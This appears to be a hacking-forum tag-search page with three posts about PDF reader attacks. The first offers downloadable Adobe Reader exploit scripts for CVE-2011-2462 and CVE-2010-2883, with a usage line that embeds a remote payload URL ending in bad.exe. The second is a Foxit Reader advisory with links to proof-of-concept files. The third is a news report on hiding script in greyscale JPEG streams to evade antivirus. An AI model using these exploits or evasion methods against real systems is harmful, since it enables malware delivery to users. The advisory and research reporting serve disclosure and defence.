Search the Community
Showing results for tags 'reader'.
-
Here is adobe reader expls CVE-2011-2462 and 2 different verions of CVE-2010-2883 all codes is pythons usage for cve2011-4262 : createExploitPDF.py http://example.com/bin/bad.exe usage for CVE-2010-2883 : [input_file.exe] [output_file.pdf] adobe.rar — RGhost — file sharing List of files File name Size Compressed Ratio adobe/createExploitPDF.py 32.2 KB 5.93 KB 18.425% adobe/PDF2883v2.py 414 KB 128 KB 30.835% adobe/PDF2883v3.py 665 KB 202 KB 30.306% adobe Source: opensc
- 2 replies
-
- adobe
- cve-2010-2883
-
(and 3 more)
Tagged with:
-
##################################################################################### Application: Foxit Products GIF Conversion Memory Corruption Vulnerabilities (DataSubBlock) Platforms: Windows Versions: The vulnerability is confirmed in version Foxit Reader 7.x. Other versions may also be affected. Secunia: SA63346 {PRL}: 2015-02 Author: Francis Provencher (Protek Research Lab’s) Website: http://www.protekresearchlab.com/ Twitter: @protekResearch ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) POC ##################################################################################### =============== 1) Introduction =============== Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing. ([url]http://en.wikipedia.org/wiki/Foxit_Reader[/url]) ##################################################################################### ============================ 2) Report Timeline ============================ 2015-01-22: Francis Provencher from Protek Research Lab’s found the issue; 2015-01-28: Foxit Security Response Team confirmed the issue; 2015-01-28: Foxit fixed the issue; 2015-03-09: Foxit released fixed version of Foxit Reader 7.1/Foxit Enterprise Reader 7.1/Foxit PhantomPDF7.1. ##################################################################################### ============================ 3) Technical details ============================ An error when handling the Size member of a GIF DataSubBlock data structure can be exploited to cause memory corruption via a specially crafted GIF file. ##################################################################################### =========== 4) POC =========== [url]http://protekresearchlab.com/exploits/PRL-2015-02.gif[/url] [url]http://www.exploit-db.com/sploits/36335.gif[/url] ############################################################################### Source
-
Greyscale pics are a great place to hide malcode Hackers can duck antivirus programs and execute malware in Adobe Reader by using greyscale images, says Danish security boffin Dénes Óvári. Lossy compression is thought to be susceptible to the DCTDecode filter, which should nuke malware woven into images and blunt this form of attack. However new intelligence published in the paper Script in a Lossy Stream (PDF) shows bad guys and penetration testers can use the filter within PDF documents to hide malcode using JPEG images that are set to greyscale to avoid distortion. This process gives antivirus and human malware analysts the slip as they generally assume any malcode hiding in the JPEG filter will be compressed and scrambled. “Following the introduction of a sandbox for JavaScript code in Acrobat Reader, the use of PDF as an attack vector decreased dramatically,” Óvári says. “Although this is not a security breach in itself, the fact that the usage of DCTDecode for this purpose has seemingly been ruled out by the industry means that even known threats could be hidden in this way from anti-virus scanners or researchers. “In order to provide users with maximum protection, the DCTDecode stream must no longer be overlooked: in PDF reader implementations, the referencing of uncompressed image data as parameters from objects expecting binary data should be prohibited.” Óvári says attacks still require exploits to be used inside the DCTDecode stream, reducing the overall threat presented by the research. He created a proof of concept attack in which he says a script was encoded as a high-quality greyscale JPEG image, placed in an image object filtered with DCTDecode, and then referenced by a JavaScript action entry. “When opening the document, the alert dialog just pops up under the old Reader 9, proving that the code of the short script was decompressed losslessly,” he says. The attack still works under the latest version of Reader with some small modification. Óvári says other file formats that assume data within JPEGs uses lossy compression while a greyscale mode is available should be re-evaluated. Source